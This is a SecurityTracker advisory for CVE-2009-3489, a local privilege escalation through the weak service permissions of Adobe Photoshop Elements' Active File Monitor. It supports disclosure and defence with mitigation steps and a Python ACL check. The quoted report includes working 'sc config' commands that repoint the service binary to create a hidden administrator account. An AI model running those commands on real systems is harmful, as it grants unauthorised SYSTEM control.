SecurityTracker.com
Category:   Application (Generic)  >   Adobe Photoshop
Vendors:   Adobe Systems Incorporated
Adobe Photoshop Elements Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022963
SecurityTracker URL:  http://securitytracker.com/id/1022963
CVE Reference:   CVE-2009-3489
Updated:  Nov 11 2009
Original Entry Date:  Sep 30 2009
Impact:   Execution of arbitrary code via local system, Root access via local system
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): Elements 7.0, 8.0
Description:   A vulnerability was reported in Adobe Photoshop Elements. A local user can obtain elevated privileges on the target system.

The Adobe Active File Monitor service is installed with an unsafe security descriptor. A local user in the 'Users' group can stop the service, use the 'sc config' command to replace the service's binary path with an arbitrary command, and then restart the service to execute arbitrary code with System privileges.

The original advisory is available at:

http://retrogod.altervista.org/9sg_adobe_pe_local.html

Nine:Situations:Group::bellick reported this vulnerability.

Impact:   A local user can obtain System privileges on the target system.
Solution:   No solution was available at the time of this entry.

The vendor has described a workaround in their advisory.

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb09-17.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb09-17.html
Cause:   Configuration error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 29 Sep 2009 10:38:22 -0600
Subject:  Adobe Photoshop Elements 8.0 Active File Monitor Service Bad

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges, e.g., run these commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permission for Everyone (!!!!!)

change the security descriptor like the following:

c:\>sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html
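
An added example, not part of the advisory or of the reporter's message: a defender's check that parses the DACL printed by "sc sdshow" and reports allow-ACEs that give a broad, low-privileged trustee the rights to reconfigure a service or rewrite its ACL. It is run here on the two descriptors quoted above; the function and constant names are hypothetical, and the list of low-privileged trustees is this example's assumption.

```python
import re

# Service rights that let a trustee repoint the binary or rewrite the ACL.
DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC",
             "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# Same rights as access-mask bits, for ACEs written as 0x... instead of letters.
MASK_BITS = {0x2: "DC", 0x40000: "WD", 0x80000: "WO",
             0x10000000: "GA", 0x40000000: "GW"}
# Broad, low-privileged trustees (this example's choice), by alias and SID.
LOW_PRIV = {"WD": "Everyone", "S-1-1-0": "Everyone",
            "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
            "IU": "Interactive", "BU": "Builtin Users",
            "BG": "Builtin Guests", "AN": "Anonymous"}

# The two descriptors quoted in the message above.
INSTALLED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
HARDENED = ("D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)")


def risky_aces(sddl):
    """Return [(trustee, [rights])] for allow-ACEs in the DACL that give a
    low-privileged trustee a dangerous right."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")  # type;flags;rights;obj;inherit_obj;trustee
        if len(fields) < 6 or fields[0] != "A" or fields[5] not in LOW_PRIV:
            continue
        rights = fields[2]
        if rights.lower().startswith("0x"):
            mask = int(rights, 16)
            tokens = [name for bit, name in MASK_BITS.items() if mask & bit]
        else:
            tokens = re.findall(r"[A-Z]{2}", rights)
        hits = [DANGEROUS[t] for t in tokens if t in DANGEROUS]
        if hits:
            findings.append((LOW_PRIV[fields[5]], hits))
    return findings


if __name__ == "__main__":
    for label, sddl in (("installed", INSTALLED), ("hardened", HARDENED)):
        print(label, risky_aces(sddl) or "no risky ACEs")
```

The check flags DC (SERVICE_CHANGE_CONFIG) alongside the WD and WO rights the message points out, since DC is the right that "sc config" needs.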

 
 



Copyright 2014, SecurityGlobal.net LLC